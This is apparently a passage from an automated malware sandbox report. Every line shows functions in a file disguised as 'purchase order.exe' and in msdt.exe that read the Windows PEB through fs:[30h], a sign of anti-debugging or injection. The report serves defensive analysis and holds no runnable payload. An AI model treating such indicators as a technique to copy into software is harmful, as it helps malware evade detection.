Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827794 mov eax, dword ptr fs:[00000030h] 2_2_01827794
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BFF60 mov eax, dword ptr fs:[00000030h] 2_2_017BFF60
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BEF40 mov eax, dword ptr fs:[00000030h] 2_2_017BEF40
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DE730 mov eax, dword ptr fs:[00000030h] 2_2_017DE730
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h] 2_2_017A4F2E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h] 2_2_017A4F2E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CF716 mov eax, dword ptr fs:[00000030h] 2_2_017CF716
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h] 2_2_017DA70E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h] 2_2_017DA70E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187070D mov eax, dword ptr fs:[00000030h] 2_2_0187070D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187070D mov eax, dword ptr fs:[00000030h] 2_2_0187070D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E37F5 mov eax, dword ptr fs:[00000030h] 2_2_017E37F5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h] 2_2_0183FF10
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h] 2_2_0183FF10
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878F6A mov eax, dword ptr fs:[00000030h] 2_2_01878F6A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B8794 mov eax, dword ptr fs:[00000030h] 2_2_017B8794
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183FE87 mov eax, dword ptr fs:[00000030h] 2_2_0183FE87
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h] 2_2_017CAE73
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B766D mov eax, dword ptr fs:[00000030h] 2_2_017B766D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h] 2_2_01870EA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h] 2_2_01870EA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h] 2_2_01870EA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018246A7 mov eax, dword ptr fs:[00000030h] 2_2_018246A7
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h] 2_2_017B7E41
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0185FEC0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878ED6 mov eax, dword ptr fs:[00000030h] 2_2_01878ED6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AE620 mov eax, dword ptr fs:[00000030h] 2_2_017AE620
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h] 2_2_017DA61C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h] 2_2_017DA61C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h] 2_2_017AC600
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h] 2_2_017AC600
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h] 2_2_017AC600
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D8E00 mov eax, dword ptr fs:[00000030h] 2_2_017D8E00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861608 mov eax, dword ptr fs:[00000030h] 2_2_01861608
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B76E2 mov eax, dword ptr fs:[00000030h] 2_2_017B76E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D16E0 mov ecx, dword ptr fs:[00000030h] 2_2_017D16E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D36CC mov eax, dword ptr fs:[00000030h] 2_2_017D36CC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E8EC7 mov eax, dword ptr fs:[00000030h] 2_2_017E8EC7
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185FE3F mov eax, dword ptr fs:[00000030h] 2_2_0185FE3F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h] 2_2_0186AE44
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h] 2_2_0186AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486849B mov eax, dword ptr fs:[00000030h] 5_2_0486849B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928CD6 mov eax, dword ptr fs:[00000030h] 5_2_04928CD6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049114FB mov eax, dword ptr fs:[00000030h] 5_2_049114FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048D6CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048D6CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048D6CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h] 5_2_048D6C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h] 5_2_048D6C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h] 5_2_048D6C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h] 5_2_048D6C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488BC2C mov eax, dword ptr fs:[00000030h] 5_2_0488BC2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A44B mov eax, dword ptr fs:[00000030h] 5_2_0488A44B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h] 5_2_048EC450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h] 5_2_048EC450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487746D mov eax, dword ptr fs:[00000030h] 5_2_0487746D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h] 5_2_0488FD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h] 5_2_0488FD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048835A1 mov eax, dword ptr fs:[00000030h] 5_2_048835A1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049205AC mov eax, dword ptr fs:[00000030h] 5_2_049205AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049205AC mov eax, dword ptr fs:[00000030h] 5_2_049205AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov ecx, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04908DF1 mov eax, dword ptr fs:[00000030h] 5_2_04908DF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0486D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0486D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928D34 mov eax, dword ptr fs:[00000030h] 5_2_04928D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491E539 mov eax, dword ptr fs:[00000030h] 5_2_0491E539
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AD30 mov eax, dword ptr fs:[00000030h] 5_2_0485AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048DA537 mov eax, dword ptr fs:[00000030h] 5_2_048DA537
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04893D43 mov eax, dword ptr fs:[00000030h] 5_2_04893D43
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3540 mov eax, dword ptr fs:[00000030h] 5_2_048D3540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04903D40 mov eax, dword ptr fs:[00000030h] 5_2_04903D40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04877D50 mov eax, dword ptr fs:[00000030h] 5_2_04877D50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h] 5_2_0487C577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h] 5_2_0487C577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFE87 mov eax, dword ptr fs:[00000030h] 5_2_048EFE87
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D46A7 mov eax, dword ptr fs:[00000030h] 5_2_048D46A7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928ED6 mov eax, dword ptr fs:[00000030h] 5_2_04928ED6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048836CC mov eax, dword ptr fs:[00000030h] 5_2_048836CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04898EC7 mov eax, dword ptr fs:[00000030h] 5_2_04898EC7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0490FEC0 mov eax, dword ptr fs:[00000030h] 5_2_0490FEC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048676E2 mov eax, dword ptr fs:[00000030h] 5_2_048676E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048816E0 mov ecx, dword ptr fs:[00000030h] 5_2_048816E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04888E00 mov eax, dword ptr fs:[00000030h] 5_2_04888E00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h] 5_2_0488A61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h] 5_2_0488A61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911608 mov eax, dword ptr fs:[00000030h] 5_2_04911608
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485E620 mov eax, dword ptr fs:[00000030h] 5_2_0485E620
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0490FE3F mov eax, dword ptr fs:[00000030h] 5_2_0490FE3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h] 5_2_0491AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h] 5_2_0491AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486766D mov eax, dword ptr fs:[00000030h] 5_2_0486766D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04868794 mov eax, dword ptr fs:[00000030h] 5_2_04868794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048937F5 mov eax, dword ptr fs:[00000030h] 5_2_048937F5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h] 5_2_0488A70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h] 5_2_0488A70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487F716 mov eax, dword ptr fs:[00000030h] 5_2_0487F716
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h] 5_2_048EFF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h] 5_2_048EFF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492070D mov eax, dword ptr fs:[00000030h] 5_2_0492070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492070D mov eax, dword ptr fs:[00000030h] 5_2_0492070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h] 5_2_04854F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h] 5_2_04854F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488E730 mov eax, dword ptr fs:[00000030h] 5_2_0488E730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486EF40 mov eax, dword ptr fs:[00000030h] 5_2_0486EF40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486FF60 mov eax, dword ptr fs:[00000030h] 5_2_0486FF60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928F6A mov eax, dword ptr fs:[00000030h] 5_2_04928F6A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859080 mov eax, dword ptr fs:[00000030h] 5_2_04859080
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h] 5_2_048D3884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h] 5_2_048D3884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048990AF mov eax, dword ptr fs:[00000030h] 5_2_048990AF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov ecx, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov ecx, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048558EC mov eax, dword ptr fs:[00000030h] 5_2_048558EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04924015 mov eax, dword ptr fs:[00000030h] 5_2_04924015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04924015 mov eax, dword ptr fs:[00000030h] 5_2_04924015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
